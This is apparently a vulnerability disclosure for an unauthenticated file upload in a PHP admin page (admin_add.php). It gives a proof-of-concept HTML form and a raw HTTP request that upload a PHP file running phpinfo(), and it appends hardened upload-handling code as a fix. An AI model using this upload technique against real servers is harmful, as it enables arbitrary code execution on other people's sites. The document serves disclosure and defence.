version: 1.0

No login required.

POC:

upload form

```html
<html>
<form method="post" action="http://127.0.0.1:8888/admin_add.php" enctype="multipart/form-data">
<td><input type="text" name="add" value="1" readOnly="true"></td>
<td><input type="file" name="image"></td>
<input type="submit" name="save" value="upload" class="btn btn-primary">
</form>
</html>
```

or post data

```
POST /admin_add.php HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8888/1.html
Content-Type: multipart/form-data; boundary=---------------------------1224355802559658660204724760
Content-Length: 453
Connection: close
Cookie: PHPSESSID=70880fb8e6521683e23cd9479d86610c
Upgrade-Insecure-Requests: 1

-----------------------------1224355802559658660204724760
Content-Disposition: form-data; name="add"

1
-----------------------------1224355802559658660204724760
Content-Disposition: form-data; name="image"; filename="1.php"
Content-Type: text/php

<?php phpinfo(); ?>
-----------------------------1224355802559658660204724760
Content-Disposition: form-data; name="save"

upload
-----------------------------1224355802559658660204724760--
```

After you upload your file you will find it here: /bootstrap/img/1.php

View source code admin_add.php

suggest: Please check upload file.

author: zionlab@dbappsecurity.com.cn
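
One way to act on the suggestion above, as an added example that is not part of the original report or the project's own code: a PHP upload handler that requires a logged-in session, decides the file type from its content, and stores it under a server-generated name. The session key `admin_id`, the allowlist, the size limit and the function name `store_uploaded_image` are assumptions; the field name `image` and the `/bootstrap/img` directory come from the report.

```php
<?php
// Added example, not the project's code. Assumptions: the session key
// 'admin_id', the allowlist, the size limit and store_uploaded_image().
declare(strict_types=1);
session_start();

const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];
const MAX_BYTES = 2 * 1024 * 1024;

function store_uploaded_image(array $file, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name']) || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('invalid upload');
    }
    // Decide the type from the file content, not from the client-supplied
    // filename ("1.php") or Content-Type header ("text/php").
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!is_string($mime) || !isset(ALLOWED_TYPES[$mime])
        || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an allowed image type');
    }
    // Server-generated name with an allowlisted extension only.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    if (!move_uploaded_file($file['tmp_name'], $destDir . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// Require an authenticated session before touching the upload.
if (empty($_SESSION['admin_id'])) {
    http_response_code(403);
    exit('login required');
}
try {
    $stored = store_uploaded_image($_FILES['image'] ?? [], __DIR__ . '/bootstrap/img');
    echo 'stored as ' . htmlspecialchars($stored);
} catch (RuntimeException $e) {
    http_response_code(400);
    echo 'upload rejected';
}
```

With this handler the request shown in the report is rejected twice over: there is no authenticated session, and the content of `1.php` does not identify as an allowlisted image type.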